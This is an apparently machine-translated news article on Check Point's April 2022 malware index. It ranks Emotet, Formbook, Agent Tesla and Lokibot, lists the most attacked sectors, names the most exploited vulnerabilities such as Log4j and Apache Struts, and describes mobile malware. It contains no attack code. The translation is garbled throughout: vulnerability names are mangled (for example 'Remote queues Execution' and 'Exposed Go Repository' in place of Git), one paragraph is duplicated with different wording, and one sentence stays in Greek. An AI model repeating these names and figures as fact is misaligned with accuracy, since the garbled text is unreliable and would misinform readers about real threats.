Η Check Point Research, its research department Check Point Software Technologies Ltd., published it Global Threat Index for April 2022. Researchers report that Emotet is still the most common malware affecting 6% of organizations worldwide. Despite this, there was movement for all the other malicious programs on the list.
The Tofsee and Nanocore came out and were replaced by Formbook and Lokibot, which is now the second and sixth most common malware respectively.
That's it Emotet's highest score in March (10%) was mainly due to specific Easter-themed scams, but this month's decline could also be explained by Microsoft disable specific macros associated with its files Office, affecting the way in which Emotet usually delivered. In fact, there are reports that the Emotet has a new delivery method- using emails Phishing containing an address URL of OneDrive.
The Emotet has many uses since it manages to bypass tsecurity of a machine. Due to the advanced techniques of propagation and assimilation, the Emotet also offers other malicious programs to cybercriminals in dark web forums, including banking Trojans, ransomwares, botnets etc. As a result, just the Emotet find a breach, the consequences may vary depending on which malware was delivered after the breach.
Elsewhere in the index, the Lokibot, one infostealer, returned to the list in sixth place after a campaign spam with a high profile that delivered the malware via files xLSX that look like legal invoices. This, as well as its rise Formbook, had an impact on the position of other malicious programs, with the advanced trojan remote access (RAT) agent Tesla, for example, to fall to third place from second.
At the end of March, critical vulnerabilities were identified in Java Spring Framework, known as Spring4Shell, and since then, numerous threat carriers have used the threat to spread Mirai, the ninth most common malware this month.
"With the landscape of cyber threats constantly evolving and with large companies such as Microsoft to influence the parameters within which cybercriminals can operate, perpetrators become more creative in the way they distribute malware, as shown in the new distribution method now used by cybercriminals. Emotet", He said η Maya Horowitz, vice president of research Check Point.
"In addition, this month we have witnessed vulnerabilities Spring4Shell which became a front page. "Although it is not yet in the top ten vulnerabilities, it is worth noting that over 35% of organizations worldwide have already been affected by this threat in just the first month, so we expect to see it rise to the top in the coming months."
Η CPR also revealed this month that Education and Research remain the most targeted branch of cybercriminals worldwide. THE "Web Server Exposed Git Repository Information DisclosureIs the most exploited vulnerability, affecting 46% of organizations worldwide, and is closely followed byApache Log4j Remote queues Execution“. The "Apache Struts ParametersInterceptor ClassLoader Security Bypass”Launches into the index, now occupying the third place with a global impact of 45%.
Top malware families
* The arrows refer to the change of the ranking in relation to the previous month.
This month the Emotet is still the most widespread malware, affecting 6% of organizations worldwide, closely followed by Formbook affecting 3% of organisms and agent Tesla with a global impact of 2%.
- ↔Emotet - Eself-replicating modular trojan. Emotet once served as a Trojan horse for spying on bank accounts and has recently been used to distribute other malware or malware campaigns. It uses many avoidance methods and techniques to stay in the system and avoid detection. Additionally, it may be spread by spam emails containing phishing attachments or links.
- ↑ Formbook - The Formbook it is a info stealer targeting the operating system Windows and was first identified in 2016. Available on the market as Malware-as-a-service (MaaS) in underground forums hacking for its powerful avoidance techniques and its relatively low price. The FormBook collects credentials from various web browsers, collects screenshots, monitors and records keystrokes, and can download and execute files as instructed by C&C of.
- ↓ Agent Tesla - THE agent tesla is an advanced one RAT that works as keylogger and information thief, which is capable of monitoring and collecting the victim's keyboard input, the system keyboard, taking screenshots, and extracting credentials to various software installed on the victim's machine (including Google Chrome, Mozilla Firefox and Microsoft Outlook).
Top attacking industries worldwide
Αυτόν τον μήνα η εκπαίδευση/έρευνα είναι ο κλάδος με τις περισσότερες attacks παγκοσμίως, ακολουθούμενος από την κυβέρνηση/στρατό και τους παρόχους υπηρεσιών διαδικτύου & παρόχους διαχειριζόμενων υπηρεσιών (ISP & MSP).
1. Education and research
2. Government & Army
3. Internet Service Providers & Managed Service Providers (ISP & MSP)
TOP Exploited vulnerabilities
This monthWeb Server Exposed Git Repository Information Disclosure ” is the most exploited vulnerability, impacting 46% of organizations globally, closely followed by Apache Log4j Remote Code Execution with a global impact of 46%. "Apache Struts ParametersInterceptor ClassLoader Security Bypass”Is now in third place in the top exploited vulnerabilities list, with a global impact of 45%.
This month the “ Web Server & Hosting Exposed Go Repository Information Disclosure Is the most exploited vulnerability, affecting 46% of organizations worldwide, followed byRemote code execution Apache log4jWith a global impact of 46%. The "Apache Struts ParametersInterceptor ClassLoader Security BypassIs now in third place on the list of most frequently exploited vulnerabilities, with a global impact of 45%.
- ↑ Web Server & Hosting Exposed Go Repository Information DisclosureA vulnerability to information disclosure has been reported in Git Repository. Successfully exploiting this vulnerability could allow unintentional disclosure of account information.
- ↓ Apache log4j Remote -- Execution (CVE-2021-44228)- A remote code execution vulnerability exists in Apache Log4j. Successfully exploiting this vulnerability could allow a remote intruder to execute arbitrary code on the affected system.
- ↑ Apache Struts ParametersInterceptor ClassLoader Security Bypass (CVE-2014-0094,CVE-2014-0112,CVE-2014-0113,CVE-2014-0114)- A security bypass vulnerability exists in Apache Struts. The vulnerability is due to insufficient validation of the data processed by ParametersInterceptor, allowing its manipulation ClassLoader. A remote attacker could exploit this vulnerability by providing a class parameter to an application.
TOP malware for cell phones
This month the AlienBot is the most common mobile malware followed by flubot and xHelper.
-
AlienBot - The malware family AlienBot it is a Malware-as-a-service (MaaS) for devices Android which allows a remote intruder, in the first instance, to introduce malicious code into legitimate financial applications. The attacker gains access to the victims' accounts and eventually takes full control of their device.
-
flubot- The flubot is a malware Android distributed via messages SMS phishing (Smishing), which most often imply delivery marks Logistics. Once the user does click link in the message redirects to download a fake app that contains the flubot. Once installed, the malware has several capabilities to collection credentials and the support of the business itself Smishing, including uploading the contact list as well as sending messages SMS to other telephone numbers.
-
xHelper – A malicious app that has been in the wild since March 2019 and is used to download other malicious apps and appearance advertisements. The app is capable of being hidden from the user and reinstalled in case it has been uninstalled.
|
The top 10 per country |
||
|
Malware |
Global impact |
Greece |
|
Emotet |
6.43% |
13.97% |
|
agent Tesla |
2.45% |
9.22% |
|
Lokibot |
1.84% |
8.38% |
|
Formbook |
3.42% |
6.15% |
|
XMRig |
2.45% |
2.79% |
|
Vidar |
1.06% |
2.51% |
|
Hail Mary |
0.39% |
2.23% |
|
MassLogger |
0.15% |
1.68% |
|
Remcos |
1.08% |
1.68% |
|
Seraph |
0.46% |
1.68% |
The Global Threat Impact List and its ThreatCloud Map Check Point Software, rely on its ThreatCloud intelligence? Company's largest cybercrime collaboration network, which provides data on threats and attack trends, leveraging a global network of threat detectors.
The ThreatCloud database includes over 3 billion websites and 600 million files daily and detects more than 250 million malware activities each day.
The full list of the top 10 malware families in April 2022 can be found at blog of Check Point.
